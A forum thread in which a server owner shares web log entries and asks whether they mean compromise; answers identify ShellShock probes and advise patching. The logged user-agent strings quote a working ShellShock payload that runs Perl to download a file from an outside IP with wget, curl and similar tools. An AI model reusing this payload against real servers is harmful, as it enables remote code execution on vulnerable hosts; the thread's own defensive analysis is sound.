
I have a few worrying entries in my web server logs and I'm wondering if this means that my server is vulnerable.

Firstly, the following seems to fail, receiving a 404 response:

```
[15/Jan/2016:10:27:47 +0000] "GET /cgi-bin/php4 HTTP/1.1" 404 345 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system(" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png ");'"
[15/Jan/2016:10:27:48 +0000] "GET /cgi-bin/php5 HTTP/1.1" 404 345 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system(" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png ");'"
```

But what concerns me is the next message, which appears to receive a 200 response:

```
[15/Jan/2016:10:27:48 +0000] "GET / HTTP/1.1" 200 2091 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system(" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png ");'"
```

My server responded by blocking the IP address, but clearly it was a little too late.

The logs suggest that all that was managed was to download an image file (which apparently doesn't exist on the server). But this looks like it was only a probe and could be much worse next time. Or am I assuming too much?

I can add additional filters, but what can I do to protect myself from a similar kind of attack? How would I even know if I'd already been compromised?

The IP address is located in Iran. I've already blocked China so may consider doing the same to Iran. Extreme, yes, but the logs show that thousands of attempts from China are dropped every day.

Ken Sharp
  • These are just different user agents probing your server and sometimes checking whether an exploit will work. The access log shows only what gets tried and not whether you are vulnerable. A 200 response might indicate a problem but does not have to; it depends on your web site setup, server configuration... – Steffen Ullrich Jan 15 '16 at 13:13
  • The 200 response certainly does raise eyebrows, even monobrows. – Ken Sharp Jan 15 '16 at 15:15
  • To format as code, you'd need to put 4 spaces beforehand. But that would disable word wrap, which isn't a good idea, so I think leaving it as-is would be good. – Pokechu22 Jan 15 '16 at 19:58
  • @Pokechu22 That's the one, thanks! I think I tried three spaces. Post edited. – Ken Sharp Jan 16 '16 at 20:34

1 Answer

Notice the magic string `() { :; };`. They are trying to poke around and see if your server is vulnerable to the ShellShock exploit. Perl is used here to print something and see if the attack succeeded. Make sure to patch and update your server; then you should be safe from these kinds of attacks.

HamZa
  • I knew I'd seen that somewhere before! Thankfully I'm already patched up to stop that. Phew! Thanks. – Ken Sharp Jan 15 '16 at 15:14
  • The link provided is a good read. It may be worth repeating the top comment from this link that notes that the colon in `(){ :; };` can actually be anything. So you can't rely on recognizing this exact string; it could be `(){ 123; xyz; };` or anything else. – u8it Jan 15 '16 at 19:58